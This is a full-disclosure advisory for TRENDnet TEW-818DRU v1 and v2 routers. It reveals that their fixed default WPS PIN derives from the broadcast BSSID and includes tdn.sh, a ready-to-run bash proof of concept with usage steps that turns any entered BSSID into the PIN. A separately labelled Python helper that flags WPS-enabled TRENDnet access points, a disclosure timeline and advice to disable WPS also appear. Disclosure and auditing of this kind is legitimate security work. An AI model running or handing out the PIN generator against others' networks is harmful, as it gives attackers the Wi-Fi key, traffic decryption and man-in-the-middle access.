TRENDnet TEW-818RDU versions 1 ("ac1900") and 2 ("ac3200") PIN disclosure exploit.
009d8d367598cb87819d868de644c6b1b9cfadd95a5147b5bc510f5a951e0427
########################################################################################################
# Title of the breach : Full disclosure of default PIN algorithm with PoC (tdn.sh) for TRENDnet TEW-818RDU v.1 ("ac1900") and v.2 ("ac3200")
# Credits : kcdtv
# Originally disclosed on 29 June 2014 for the first version of the TEW-818RDU (ac1900) on www.crack-wifi.com
# Link : http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# Fully disclosed on 25 June 2015 for versions 1 and 2 (ac3200) with PoC bash code (tdn.sh) on www.wifi-libre.com
# Link : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
################################################### AFFECTED DEVICE ##########################################################
# TEW-818DRU version 1 (ac1900) : A dual-band access point manufactured by TRENDnet - you can check the administration interface in the emulator here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
# TEW-818DRU version 2 (ac3200) : The latest revision of this router, the fastest router manufactured by TRENDnet, tri-band - you can check the administration interface in the emulator here : http://www.trendnet.com/emulators/TEW-818DRU_v1/login.htm
################################################### DESCRIPTION OF THE BREACH #################################################
### DANGEROUS WPS SETTINGS
# The two versions use the same kind of (bad) WPS settings:
# * WPS in PIN mode is activated by default
# * It has a PIN enabled that is not configurable. A static PIN.
# * This non-configurable PIN is also unique : the same PIN is used by all the networks (2.4 and 5 GHz bands)
# This is already a bad configuration, with the possibility to brute force the hashes from the M3 message ("pixie dust" attack) or to perform a classical brute force of the PIN itself with reaver or bully
#### BSSID-BASED ALGORITHM REVERSED
# It is the second half of the 2.4 GHz BSSID (the NIC portion) that is used to generate this unique, non-configurable and activated PIN
# The BSSID is broadcast and can be gathered with a simple wireless scan
# Instead of using - as has been done with many other devices, including some older TRENDnet devices - a straightforward hexadecimal-to-decimal conversion of this portion of the BSSID to generate the PIN, the TRENDnet crew "updated" the concept by inverting the first and the last byte of the string before conversion. A very simple example illustrates it:
### STEP 1
# Grab the BSSID of the 2.4 GHz network. As an example we will take 00:00:00:11:22:33
### STEP 2
# Grab the second half (NIC portion) of this BSSID. That would be 11:22:33 in our example
### STEP 3
# Invert the last and first byte of this string. It gives us 33:22:11
### STEP 4
# Convert from hexadecimal to decimal. It gives us 3351057
### STEP 5
# Generate the WPS checksum digit to get the full PIN. If the value obtained previously is greater than 9999999 you will have to drop the leading digit (reduce it modulo 10000000) to get a 7-digit string. If the value is lower than 1000000 you will have to zero-pad it until you get a 7-digit string. In our example we get the PIN 33510576.
# See the annotated script tdn.sh for more details.
################################################## SEVERITY ##################################################################
# A person within wifi range of the router can gain access to both the 5 GHz and 2.4 GHz networks immediately by sending the correct PIN. They will also obtain the WPA key, which could be used to perform much more intrusive actions (decrypt traffic, MITM...)
################################################# SOLUTION ##################################################################
# The risk is very high, but fortunately it is very simple to secure the WiFi network by disabling WPS in the configuration interface
# As a recommendation for your safety:
# - do not use WPS and make sure that it is absolutely disabled in every mode
# - install DD-WRT on these devices instead of the original firmware
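# The following Python audit helper is an added example, not part of this advisory or of tdn.sh. It reads wireless scan output (the scan lines and their column layout are constructed, assumed input), flags access points whose OUI is the TRENDnet prefix 00:14:D1 that tdn.sh checks for, and reports the ones that still advertise WPS, which is exactly the setting the SOLUTION section says to disable. It does not compute any PIN; it only tells an owner or auditor which networks need WPS turned off.

```python
"""Audit helper (added example): find access points in a scan that still advertise WPS,
and rank TRENDnet ones highest because their default PIN derives from the broadcast BSSID."""

import re
from dataclasses import dataclass

# OUI compared by the advisory's tdn.sh; TRENDnet also owns other OUIs that are not listed here.
TRENDNET_OUI = "00:14:D1"
BSSID_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed scan lines (assumed format): BSSID, channel, WPS flag ("WPS" or "-"), SSID.
SAMPLE_SCAN = """\
00:14:D1:11:22:33   6  WPS  HomeNet-2.4
00:14:d1:11:22:34  36  WPS  HomeNet-5G
00:14:D1:AA:BB:CC   1  -    OfficeNet
DE:AD:BE:EF:00:01  11  WPS  Neighbor
"""


@dataclass
class Finding:
    bssid: str
    ssid: str
    wps_enabled: bool
    trendnet_oui: bool
    risk: str
    advice: str


def normalize_bssid(bssid: str) -> str:
    """Upper-case a BSSID and reject anything that is not six colon-separated bytes."""
    if not BSSID_RE.match(bssid):
        raise ValueError(f"not a BSSID: {bssid!r}")
    return bssid.upper()


def is_trendnet(bssid: str) -> bool:
    """True when the first three bytes (the OUI) match the prefix tdn.sh checks for."""
    return normalize_bssid(bssid).startswith(TRENDNET_OUI)


def parse_scan(text: str) -> list:
    """Turn scan lines into (bssid, channel, wps_enabled, ssid) tuples; SSIDs may contain spaces."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        bssid, channel, wps, ssid = parts
        rows.append((normalize_bssid(bssid), int(channel), wps == "WPS", ssid))
    return rows


def classify(trendnet: bool, wps: bool) -> tuple:
    """Map (vendor, WPS state) to a risk level and the mitigation from the advisory."""
    if trendnet and wps:
        return ("HIGH", "default WPS PIN is derived from the broadcast BSSID; disable WPS in every mode")
    if wps:
        return ("MEDIUM", "WPS PIN mode exposed to brute force / pixie dust; disable WPS")
    if trendnet:
        return ("LOW", "WPS not advertised; confirm it is disabled in the admin interface")
    return ("INFO", "no WPS advertised")


def audit(text: str) -> list:
    """Run the classification over every access point in the scan."""
    findings = []
    for bssid, _channel, wps, ssid in parse_scan(text):
        trendnet = is_trendnet(bssid)
        risk, advice = classify(trendnet, wps)
        findings.append(Finding(bssid, ssid, wps, trendnet, risk, advice))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SCAN):
        print(f"{f.risk:6} {f.bssid}  {f.ssid:12} {f.advice}")
```

# Run it as `python3 audit.py`; replace SAMPLE_SCAN with lines converted from your own scanner's output and keep the same four columns.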
################################################### TIMELINE ##################################################################
# 16-06-2014 : I noticed the weak algorithm by visiting the Trendnet emulator for this device (see link in "AFFECTED DEVICE")
# 17-06-2014 : I wrote to Trendnet to ask them if the data in the web interface is correct and if the algorithm I found is the one really used
# 29-06-2014 : No answer from Trendnet, so I published my study on crack-wifi.com http://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html
# February 2015 : I found some data on the web that confirmed the use of this algorithm : https://www.youtube.com/watch?v=HyfIX1B8cx0
# 25-06-2015 : One year later, and with the newest version affected, I decided to fully disclose the breach with a PoC script, tdn.sh : https://www.wifi-libre.com/topic-160-algoritmo-pin-para-tew-818rdu-v1-ac1900-y-v2-ac3200-de-trendnet.html
############################################### CREDITS ###############################################################
# kcdtv
############################################### WEBSITE(S) ############################################################
# www.wifi-libre.com
# www.crack-wifi.com
############################################ HOW TO USE THIS POC ############################################
# Save this text in a blank file named tdn.sh
# Open a terminal in the folder where you saved the script (cd, or right click + "open terminal here")
# Launch the script from the shell with :
# bash tdn.sh
# Enter the full BSSID of the 2.4 GHz network in hexadecimal format (ex : 00:90:4C:0F:F4:D2 ) and press enter
############################################## SCRIPT (read the comments for an explanation of the algorithm) #######
#!/bin/bash
#################################################### LEGAL ADVISORY ####################################################################
# tdn.sh copyleft 25th June 2015 :
# This script is released under the GNU General Public License version 3 from the Free Software Foundation.
# This package is distributed in the hope that it will be useful, but without any warranty; it can be used, modified and shared but must be attributed according to the GPL v3 terms
# It CANNOT be sold or used for a commercial-economical purpose.
# See for more details about GPL v3 : http://gplv3.fsf.org/
NOcolor="\033[0;37m" # colors are set as variable
red="\033[1;31m"
purpple="\033[0;35m"
yellow="\033[1;33m"
white="\033[1;37m"
victorycolor="\033[1;43m"
ALGORITHM(){
###############################
# The algorithm can be divided into three steps. The first two steps are done in this function and the third one is done by the other function, "CHECKSUM()"
# 1) The first step consists in reversing the order of the last three bytes of the 2.4 GHz (b/g/n) BSSID to get a string (defined in this code as the variable "$SCRAMBLEDNIC")
# example : if the 2.4 GHz BSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value of $SCRAMBLEDNIC)
SCRAMBLEDNIC=$(echo "$BSSID" | awk -F':' '{ print $6 $5 $4 }') # with awk using ":" as a separator we grab the last three bytes of the MAC in reverse order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable "$CONVERTEDMAC". A reduction modulo 10000000 then keeps at most 7 digits, saved in the variable $STRING (the zero-padding to 8 digits is done at the end of CHECKSUM())
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBLEDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # drop the leading digit if the value is longer than 7 digits
# The 7-digit body of the PIN is generated; we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM()"
}
CHECKSUM(){ # The function CHECKSUM was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # shift the 7 digits left to make room for the 8th digit (the WPS checksum)
ACCUM=0 # accumulator for the weighted sum of the digits
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are summed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # the check digit: the sum reduced modulo 10 to its unit digit
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to "10 minus check digit", modulo 10
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # zero-padding in case the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e " -------------------------------------"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while ! echo "$BSSID" | grep -Eq '^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$'
do # filter checking that the BSSID is well formed, looping until it is (thanks to antares ;)
echo -e " $red Error :$white Invalid MAC address $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
OUICHECK=$(echo "$BSSID" | awk -F':' '{ print toupper($1 $2 $3) }') # first three bytes (the OUI), upper-cased so lower-case input compares correctly
if [[ $OUICHECK != 0014D1 ]] ;
then
echo -e "$red warning$NOcolor : This MAC address does not belong to$white TRENDnet$NOcolor"
fi
ALGORITHM # function that scrambles the NIC part of the BSSID and converts it from hexadecimal to decimal
CHECKSUM # function that generates the correct WPS checksum and gives the full default WPS PIN for the TEW-818DRU
echo -e "
$white The default$red PIN$white for 5ghz and 2,4ghz network is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0